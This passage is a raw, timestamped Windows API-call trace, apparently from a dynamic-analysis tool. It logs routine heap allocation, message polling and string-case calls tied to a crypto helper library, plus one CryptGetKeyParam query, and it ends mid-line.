[0039.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0039.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0039.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0039.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.162] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0039.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0039.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da278 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7a8 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0039.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.163] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0039.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.163] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0039.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0039.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0039.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0039.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0039.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0039.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.164] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0039.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0039.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0039.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0039.165] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0039.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0039.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0039.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0039.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.165] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.166] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0039.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0039.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0039.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0039.169] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0039.169] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3a8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3a8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0039.169] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.169] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.169] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0039.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.169] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.170] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.170] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.170] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.170] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.170] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.170] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.170] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0039.170] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.170] HeapFree (in: 